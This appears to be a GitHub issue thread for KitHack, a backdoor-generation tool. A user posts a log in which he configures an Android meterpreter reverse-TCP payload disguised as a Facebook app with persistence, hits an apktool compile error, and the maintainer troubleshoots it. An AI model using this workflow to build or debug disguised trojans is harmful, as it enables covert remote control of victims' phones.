### ISSUE TITLE
Backdoor and Msfvenom

### ISSUE THREAD

**Issue by kernelshock** [AdrMXR/KitHack#10]
After configuring the apk requirements, i get the following ERROR, in the COMPILING RAT APK instance:
[*] Compiling RAT APK...
I: Using Apktool 2.4.1-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
	at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:418)
	at brut.androlib.Androlib.buildSources(Androlib.java:349)
	at brut.androlib.Androlib.build(Androlib.java:301)
	at brut.androlib.Androlib.build(Androlib.java:268)
	at brut.apktool.Main.cmdBuild(Main.java:251)
	at brut.apktool.Main.main(Main.java:79)

[X] ERROR AL GENERAR SU BACKDOOR

Presione cualquier tecla para continuar...

is there any help??

**Comment by AdrMXR** [comment]
I need more information about it, which apk are you trying to infect? or is it a mfs apk? although most likely that apk is not vulnerable so you have to try another

**Comment by kernelshock** [comment]
Adrián i'll try to generate an apk with the msfvenom option.

**Comment by AdrMXR** [comment]
Ok, so I'll close this issue.

**Comment by kernelshock** [comment]
Why you close the threat??

**Comment by AdrMXR** [comment]
If you don't tell me the details of your problem, I can't help you, and mentioning that you're going to use msfvenom means that it no longer has anything to do with kithack, so that's why I closed it.

**Comment by kernelshock** [comment]
I dont know what info yo need. I am using Kali Linux 2020.3, all
requirements are satisfied. Firstly I installed for python2 and when I see
that doesnt work, I install it for python3.
The steps for installation was the described in README.md. The problem
emerge when i follow the steps described in the video DEMO 2 (
https://asciinema.org/a/oV5lttCQpOmmgcgIaFIQEkcxY).
But i have the following error:

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________        __  __ ____  _______     _______ _   _
 ___  __  __
         \ _ /            |\     |  \/  / ___||  ___\ \   / / ____| \ | |/
_ \|  \/  |
          o_o \    M S F  | *    | |\/| \___ \| |_   \ \ / /|  _| |  \| | |
| | |\/| |
               \   _____  |      | |  | |___) |  _|   \   / | |___| |\  |
|_| | |  | |
                |||   WW|||      |_|  |_|____/|_|      \_/  |_____|_|
\_|\___/|_|  |_|
||| |||               (https://github.com/AdrMXR/KitHack)



 [*] Sys Payloads:

[01] LINUX --> Kithack.elf
[02] WINDOWS --> Kithack.exe
[03] ANDROID --> Kithack.apk
[04] MAC OS --> Kithack.macho
[05] PHP --> Kithack.php
[06] PYTHON --> Kithack.py
[07] BASH --> Kithack.sh
[08] PERL --> Kithack.pl
[09] RUN MSFCONSOLE
 [0] Back
KitHack >> 03

 [*] Select Payload:

[01] android/meterpreter_reverse_http
[02] android/meterpreter_reverse_https
[03] android/meterpreter_reverse_tcp
[04] android/meterpreter/reverse_tcp
[05] android/shell/reverse_http
[06] android/shell/reverse_https
[07] android/shell/reverse_tcp
KitHack >> 4

 [*] Select APK Type:

[01] APK MSF
[02] APK ORIGINAL
KitHack >> 1

Local IP: 192.168.0.204

Public IP: 201.xxx.xx.xx

Ngrok TCP: tcp://2.tcp.ngrok.io:xxxxx


SET LHOST: 192.168.0.204

SET LPORT: 2222

[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)
KitHack >> y

ICON: /home/mxz/extra_tools/KitHack/icons/facebook-sample.png

Ingrese un nombre para su archivo de salida: facebook-full

[!] ¿Desea crear persistencia a su APK? (y/n)
KitHack >> y

[*] Generating backdoor...
[-] No platform was selected, choosing Msf::Module::Platform::Android from
the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10188 bytes

[*] Decompiling APK...
I: Using Apktool 2.4.1-dirty on payload.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file:
/root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

[*] Configuring icon change...

[*] Compiling RAT APK...
I: Using Apktool 2.4.1-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError:
java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
at
org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:418)
at brut.androlib.Androlib.buildSources(Androlib.java:349)
at brut.androlib.Androlib.build(Androlib.java:301)
at brut.androlib.Androlib.build(Androlib.java:268)
at brut.apktool.Main.cmdBuild(Main.java:251)
at brut.apktool.Main.main(Main.java:79)

[X] ERROR AL GENERAR SU BACKDOOR

Presione cualquier tecla para continuar...

Please let me know if u need some more info.

Thanks

**Comment by AdrMXR** [comment]
Before you installed KitHack, did you already have `apktool `installed? it is probably your version of `apktool`, please provide me the version of `apktool `you have installed.
